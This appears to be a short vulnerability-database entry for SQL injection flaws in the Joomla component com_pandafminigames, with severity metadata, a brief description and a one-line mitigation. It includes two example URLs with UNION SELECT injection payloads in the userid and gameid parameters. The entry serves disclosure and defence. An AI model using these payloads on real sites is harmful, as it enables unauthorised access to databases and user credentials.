vendor:
com_pandafminigames
by:
Valentin Hoebel
7,5
CVSS
HIGH
multiple SQL Injection vulnerabilities
89
CWE
Product Name: com_pandafminigames
Affected Version From: unknown
Affected Version To: unknown
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
Joomla Component com_pandafminigames SQL Injection Vulnerabilities
Multiple SQL Injection vulnerabilities exist in the Joomla Component com_pandafminigames. An attacker can exploit these vulnerabilities to gain access to sensitive information from the database, such as usernames and passwords. Example URLs include index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+AND+1=2+UNION+SELECT+concat(database()),2,concat(database()),4,5,6,7,8,9,10,11,12-- and index.php?option=com_pandafminigames&Itemid=XX&gameid=X+AND+1=2+UNION+SELECT+concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),7,8--.
Mitigation:
Ensure that all user input is properly validated and sanitized before being used in a SQL query.